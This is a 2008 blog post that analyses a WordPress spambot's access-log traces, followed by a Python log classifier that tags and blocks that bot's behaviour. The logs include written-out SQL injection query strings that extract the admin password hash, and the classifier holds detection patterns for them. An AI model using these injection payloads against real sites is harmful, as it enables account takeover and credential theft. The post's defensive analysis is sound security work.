failed blogspam automation from China
An exceptionally dumb spambot from China visited my blog and tried to exploit several WordPress vulnerabilities that might have worked once against ancient versions. Let me split its traces into several parts:
1. Checking for a no longer existing article and not quite understanding the difference between mod_rewrite fake directories and actual directories. Maybe this script was optimised for blogs that run WordPress in its stock query-string mode (which is brief, but not really the most you can get out of your blog, search-engine-wise):
58.241.255.38 - - [13/Nov/2008:21:28:15 +0100] "HEAD /using-bbclone-with-wordpress-232-the-almost-easy-way/wp-admin/index.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:16 +0100] "GET /using-bbclone-with-wordpress-232-the-almost-easy-way/ HTTP/1.1" 404 6045 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
I’m seeing this quite often and usually this is all that will happen. But not at this time…
2. Trying to mess around in the admin section and not figuring out that I restricted access to my own IP address ranges. Obviously the script has no handler for 403 responses and thus keeps on trying something that isn't going to work...
58.241.255.38 - - [13/Nov/2008:21:28:18 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:19 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:20 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:21 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:22 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:23 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:24 +0100] "HEAD /wp-login.php?action=logout HTTP/1.1" 302 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:28:25 +0100] "HEAD /wp-admin/theme-editor.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
This silliness went on like this for a minute, apparently trying to exploit a long-fixed vulnerability in WordPress' admin section.
3. Next comes another try at exploiting an old security hole in the admin section (still not getting that access is forbidden...) before the script finally resorts to planting trackback spam, which isn't working either :-). Most people have turned this feature off in the meantime, because spammers rendered it entirely useless and there are other ways to learn about one's backlinks.
58.241.255.38 - - [13/Nov/2008:21:29:11 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 225 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:12 +0100] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:13 +0100] "POST /xmlrpc.php HTTP/1.1" 200 774 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:14 +0100] "POST /wp-trackback.php?tb_id=1 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
4. Attempts at an SQL injection
58.241.255.38 - - [13/Nov/2008:21:29:16 +0100] "GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:17 +0100] "GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 301 - "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
This has been fixed for a while already and is designed to compromise the admin account (user id=1). Spammers use this for adding or modifying content on a compromised site, which is then spamvertised via blogspam or, if the site attracts enough traffic, used for running exploits via inserted iframes.
5. Looking for non-existing trackbacks
58.241.255.38 - - [13/Nov/2008:21:29:18 +0100] "GET /wp-trackback.php?p=1 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:19 +0100] "GET /wp-trackback.php?p=2 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:20 +0100] "GET /wp-trackback.php?p=3 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:21 +0100] "GET /wp-trackback.php?p=4 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:23 +0100] "GET /wp-trackback.php?p=5 HTTP/1.1" 200 135 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
This went on until "p" reached the value 25 and was entirely useless, because even if trackbacks had been enabled, the request was malformed (lacking an id).
6. Repeating the trackback spam attempts that didn't work out before...
58.241.255.38 - - [13/Nov/2008:21:29:48 +0100] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
58.241.255.38 - - [13/Nov/2008:21:29:50 +0100] "POST /xmlrpc.php HTTP/1.1" 200 473 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
The host 58.241.255.38 is located in China and looks like a compromised machine nobody bothers to fix:
http://www.google.com/search?q=58.241.255.38
route: 58.240.0.0/15
origin: AS4837
descr: CHINA169-BACKBONE CNCGROUP China169 Backbone
lastupd-frst: 2008-05-19 12:06Z 202.249.2.169@rrc06
lastupd-last: 2008-11-13 13:38Z 193.232.244.111@rrc13
seen-at: rrc00,rrc01,rrc03,rrc04,rrc05,rrc06,rrc07,rrc10,rrc11,rrc12,rrc13,rrc14,rrc15,rrc16
num-rispeers: 113
source: RISWHOIS
The script itself, as indicated by its user agent and modus operandi, has been seen around for a while on different occasions:
http://www.google.com/search?q=k1b+compatible%3B+rss+6.0%3B+Windows+Sot+5.1+Security+Kol
Blocking the user agent via Apache SetEnvIf/Rewrite rules should already take care of the problem. Additionally, firewalling or denying access for this unmaintained machine may be a good idea, too.
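As an added example (not code from the original post), here is a small Python detector that parses combined-format log lines like the ones above and tags the behaviours walked through in parts 2, 4 and 5: the bot's user agent, repeated 403s on wp-admin URLs, trackback enumeration and the double-encoded SQL injection in the query string. The log regex, tag names, block threshold and sample lines are this example's own assumptions; the sample IPs come from documentation ranges, not from the post.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" log format as quoted in the post; this regex is the example's own.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
BOT_UA = "k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol"  # fragment quoted in the post
SQLI_RE = re.compile(r"union\s+select|\bconcat\(|/\*\s*$", re.IGNORECASE)

# Constructed sample lines (documentation-range IPs, one fixed timestamp); not the post's log.
UA = f"Mozilla/4.0 ({BOT_UA})"
def _line(ip, req, status, size, ua):
    return f'{ip} - - [13/Nov/2008:21:28:19 +0100] "{req} HTTP/1.1" {status} {size} "-" "{ua}"'
SAMPLE = [
    _line("192.0.2.10", "HEAD /wp-login.php?action=logout", 302, "-", UA),
    _line("192.0.2.10", "HEAD /wp-admin/theme-editor.php", 403, "-", UA),
    _line("192.0.2.10", "HEAD /wp-admin/theme-editor.php", 403, "-", UA),
    _line("192.0.2.10", "GET /index.php?cat=%2527+UNION+SELECT+user_pass+FROM+wp_users/*", 301, "-", UA),
    _line("192.0.2.10", "GET /wp-trackback.php?p=1", 200, 135, UA),
    _line("192.0.2.10", "GET /wp-trackback.php?p=2", 200, 135, UA),
    _line("198.51.100.7", "GET /feed/", 200, 8210, "Mozilla/5.0 (compatible; Googlebot/2.1)"),
]

def parse(line):
    # Fields of one combined-format line, or None when the line does not parse.
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def classify(req):
    """Tag one parsed request with the behaviours the post walks through."""
    tags = set()
    if BOT_UA in req["ua"]:
        tags.add("known-bot-ua")
    if req["path"].startswith("/wp-admin/") and req["status"] == "403":
        tags.add("admin-probe-403")  # retrying a forbidden admin URL
    if re.fullmatch(r"/wp-trackback\.php\?p=\d+", req["path"]):
        tags.add("trackback-enum")  # walking p=1,2,3... without an id
    if SQLI_RE.search(unquote_plus(unquote_plus(req["path"]))):  # bot double-encoded %2527
        tags.add("sqli-attempt")
    return tags

def summarize(lines):
    """Per-client-IP counts of each tag over a batch of log lines."""
    per_ip = {}
    for req in filter(None, map(parse, lines)):
        per_ip.setdefault(req["ip"], Counter()).update(classify(req))
    return per_ip

def should_block(counts, repeat=5):
    """Known UA or SQLi: block at once; mere probing only once it repeats."""
    return bool(counts["known-bot-ua"] or counts["sqli-attempt"]
                or counts["admin-probe-403"] >= repeat or counts["trackback-enum"] >= repeat)
```

The verdict from should_block is what a SetEnvIf rule or firewall entry would then act on; a real deployment would read the access log incrementally rather than a fixed list.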